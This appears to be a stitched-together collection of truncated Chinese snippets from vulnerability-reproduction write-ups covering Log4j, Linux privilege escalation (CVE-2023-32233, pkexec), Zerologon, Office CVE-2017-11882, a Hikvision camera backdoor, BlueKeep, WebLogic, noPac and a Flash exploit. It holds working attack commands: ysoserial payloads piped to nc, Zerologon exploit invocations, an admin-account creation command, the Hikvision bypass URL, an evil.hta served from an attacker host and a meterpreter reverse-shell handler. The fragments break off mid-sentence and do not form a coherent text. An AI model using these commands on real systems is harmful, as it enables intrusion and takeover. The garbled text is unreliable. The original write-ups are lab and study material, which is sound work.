01 漏洞描述 Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。 参考地址: https://github.com/vulhub/vulhub 本次漏洞复现也是基于Vulhub 02 漏洞环境搭建 docker-compose up -d --build 访问http
[漏洞名称]:CVE-2023-32233 NetFilter权限提升 [漏洞描述]:由研究人员 Patryk Sondej (波兰)和 Piotr Krysiuk(爱尔兰)发现,Linux 内核的 poc二进制文件: 输入:gcc -Wall -o exploit exploit.c -lmnl -lnftnl 如果觉得以上太困难 个人推荐去大佬的环境下载地址,里面有做好的镜像,可以直接进行下面复现过程 pwd=8888 [复现过程]: 输入命令:cd ~ ls 查看根目录: 执行编译好的exp文件: . /exp 成功得到root权限: [参考资料]: Liuk3r/CVE-2023-32233:CVE-2023-32233:Linux内核中的安全漏洞CVE-2023-32233 (github.com ) CVE漏洞复现-CVE-2023-32233 NetFilter权限提升-CSDN博客 CVE-2023-32233 (LINUX内核权限提升漏洞)_cve-2023 提权-CSDN博客
作者-ohh 本次测试环境为w7 1.cve-2019-1388利用工具:https://github.com/jas502n/CVE-2019-1388 cve-2019-1388提权影响范围如下: 2.cve-2019-0803利用工具: https://github.com/k8gege/K8tools/blob/master/CVE-2019-0803.exe 漏洞影响范围: ? cve-2019-0803 cmd “net user admin999 admin /add” ?
近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 复现 环境 kali x64 centos 7 vmware14 设置网络 断开kali和centos的网络 将kali和centos都设置成主机模式,并且关闭主机的dhcp功能 ?
本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员) Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645) 一、漏洞原理 Apache 二、环境搭建 cd /vulhub/log4j/CVE‐2017‐5645 #进入环境目录 docker‐compose build && docker‐compose up ‐d 三、漏洞复现 payload 使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 java ‐jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE‐2017‐5645_is_succe ss" | nc your‐ip 4712 执行docker‐compose exec log4j bash进容器 可见 /tmp/CVE‐2017‐5645_is_success已成功创建: ?
cve-2021-4034复现 影响范围 exp 打码 复现 参考 cve-2021-4034复现 Linux Polkit 本地提权漏洞 cvss评分 7.8 高危 polkit的pkexec 存在本地权限提升漏洞 执行php的iconv函数 ,本质是调用 glibc的 iconv_open 函数 3. iconv_open 函数 依照 GCONV_PATH 找到 gconv-modules 文件 4. ))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) # 执行 复现
tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce 下载复现工具: git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git ---- 一.本地调用计算器复现 1.本地生成Exploit.class恶意文件类,里面写入了恶意代码calc X:\XXX\XXX\XXXX\XXXXX\CVE-2021-44228-Apache-Log4j-Rce-main \src\main\java\Exploit.java中写入calc命令 image.png cd X:\XXX\XXX\XXXX\XXXXX\CVE-2021-44228-Apache-Log4j-Rce-main 也就是说,log4j2漏洞版本只要是能写日志的,都可以触发 X:\XXX\XXX\XXXX\XXXXX\CVE-2021-44228-Apache-Log4j-Rce-main\src\main\java \log4j.java image.png image.png image.png image.png 二.访问远程恶意类调用本地计算器复现 1.远程VPS环境配置 (1)VPS_OS:Ubuntu 20.04.3
-2020-1472 cd CVE-2020-1472\ pip install -r requirements.txt python zerologon_tester.py DC_NETBIOS_NAME 整个利用过程大概是下列流程 置空域控保存在AD中的密码 获取域控用户HASH 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH 通过获取到的HASH恢复置空的域控密码 利用复现 下载EXP # ~/impacket/ cd examples git clone https://github.com/dirkjanm/CVE-2020-1472 cd CVE-2020-1472 \ 置空密码 # ~impacket/examples/CVE-2020-1472 python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR 修复建议 安装符合操作系统的漏洞补丁,详情请见:https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-1472
本文作者:\xeb\xfe(来自信安之路作者团队) 近日,红帽官方发布了安全更新,修复了编号为 CVE-2018-1111 的远程代码执行漏洞,攻击者可以通过伪造 DHCP 服务器发送响应包,攻击红帽系统 影响版本 1、Red Hat Enterprise Linux Server 6 2、Red Hat Enterprise Linux Server 7 3、CentOS 6 4、CentOS 7 漏洞详情 漏洞复现过程 环境准备 这里我用的测试机器系统分别是Centos 7 和 Kali 2018.2。 Centos 7 作为被攻击机,需要设置自动获取 ip 地址。 CVE2018-1111 漏洞复现到此结束~! 通过本文,大家可以学习到如何用 dnsmasq 来快速搭建一个 DNS 服务或者 DHCP 服务,并对 DHCP 服务的 option 部分值和含义有相关了解,以及学习了 CVE2018-1111 漏洞的复现及环境搭建
CVE官方给出的提示: welcome.php页面存在SQL注入,并且这个参数是eid 打开靶场环境: 页面是一个登陆注册的界面 用户注册: 1 01@0.com 123456 执行如下命令: sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch 回显如下: 得出flag: flag{cdadbe80-6b13-4ce7
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
3420557312|B58548681854236C7939003B583A8078|/ 可以自行下载学习 在github上找到了k8师傅写的批量检测工具; https://github.com/k8gege/CVE -2019-0708#%E5%BE%AE%E8%BD%AF3389%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9Ecve-20190708%E6%89%B9%E9%87%8F%E6% 我们是VM 15 选择4 ? 设置靶子IP ? ? 结束 请遵循网络安全法,本片文章只提供学习研究之用 祝大家学业有成。
作者-Beginner 0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 ? 0x02 漏洞复现: 利用Goby发现漏洞(CVE-2017-7921): ? 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 ? 2CD2xx0F-ISeries5.2.0build140721 版本至5.4.0Build160401版本; DS-2CD2xx2FWDSeries5.3.1build150410 版本至5.4.4Build161125版本; DS-2CD4x2xFWDSeries5.2.0build140721 版本至5.4.0Build160414版本; DS-2CD4xx5Series5.2.0build140721 版本至5.4.0Build160421版本; DS-2DFxSeries5.2.0build140805
项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试。 建议所有操作都在一台机器上复现,避免网络问题导致的复现失败! payload sender 使用Y4er的项目生成weblogic_CVE_2020_2551.jar包,这是一个payload发送器,这个jar发包之后肯定会报错NamingServer之类的错误, ---- 项目引用 WeblogicEnvironment CVE-2020-2551 漏洞分析参考 WebLogic WLS核心组件RCE分析(CVE-2020-2551) - 安全客,安全资讯平台 Weblogic CVE-2020-2551 IIOP协议反序列化RCE – Y4er的博客 漫谈 WebLogic-CVE-2020-2551
前不久关于RDP的0708漏洞网上一片哀嚎,今天测试复现了一下,发现攻击之后,都会使得系统蓝屏。 CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。 2003 0X2 漏洞检测 各个厂家都已经发布了检测工具,在这里,我们使用开源的检测脚本,在msf上加载即可使用,下载链接: https://github.com/zerosum0x0/CVE
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。 Microsoft Office 2016 0x01 环境清单 WindowsServer 2008 (192.168.3.114) Office 2007 MAC OSX(192.168.3.106) 0X02 复现过程 将生成的hta文档放入WebServer根目录:http://192.168.3.106/evil.hta python webdav_exec_CVE-2017-11882.py -u http:// 我(Cobalt Strike)本地监听了一个8081端口,用来接收客户端的Shell 要生成一个rtf/doc文档,github上已有生成脚本 webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py 生成rtf文档: 最后将test.rtf在目标机器上执行
0x02:复现环境 首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。 每种都代表了机器架构 在我的复现环境中使用target 3即可,如若不行尝试使用1,2,4 ? 4. 遇到的问题 1) 配置完参数后也无法打成功 ? 解决方法:1.多尝试几次 2)出现Set ForceExploit错误 ? 解决方法:1.靶机IP无法访问,关闭防火墙 2.开启3389端口 3) 每次攻击都导致蓝屏 解决方法:1.尝试更换target id 2.查看对应系统版本是否正确 4) 模块加载不成功 解决方法: -2019-0708远程桌面代码执行漏洞复现: https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?
今天一起来看看CVE-2017-10271的复现吧~ ? ? 部署CVE-2017-10271: ? 查看虚拟机状态: ? 可以看到端口映射到了7001,尝试访问: ? 成功,搭建完毕~ ? 安装完成~ 4、创建domain域名 使用以下命令: cd /home/weblogic/Oracle mkdir -p user_projects/domains/base_domain cd user_projects Part.3 漏洞复现 漏洞检测 可以直接使用工具进行漏洞检测: ? Part.4 漏洞修复 1、临时方案 删除WebLogicwls-wsat组件: rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server
距离漏洞披露已经过了许久,现在终于有些空余时间用于学习复现这两个漏洞。 概括 CVE-2021-42278,机器账户的名称一般用$结尾,但AD并未对域内机器账户名进行验证。 CVE-2021-42287, 结合上述42278漏洞,创建一个与DC机器账户名称相同的机器账户(不以$结尾),使用该账户请求一个TGT后,修改账户名,然后通过S4U2Self申请TGS Ticket, 通过S4U2Self向KDC申请ST 拿到高权限ST票据,完成利用。 利用原理:如果域内存在一台域控名为DC(机器账户为DC)的域控机,此时攻击者可利用CVE-2021-42287漏洞去申请一个机器账户,再将机器账户的sAMAccountName修改为DC。 复现过程: 手动实现 1.创建机器账户 拿到域成员权限后,利用Powermad.ps1创建机器用户 Import-Module Poweremad.ps1 New-MachineAccount -MachineAccount
攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎 监听payload,用来接受反弹的shell: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp_rc4 set LPORT 6666 set LHOST 192.168.0.104 set RC4PASSWORD zale 接下来,我们生成攻击的程序和网页,生成脚本EXP下载地址: https://github.com /Ridter/CVE-2018-15982_EXP 通过-h参数查看脚本使用: ?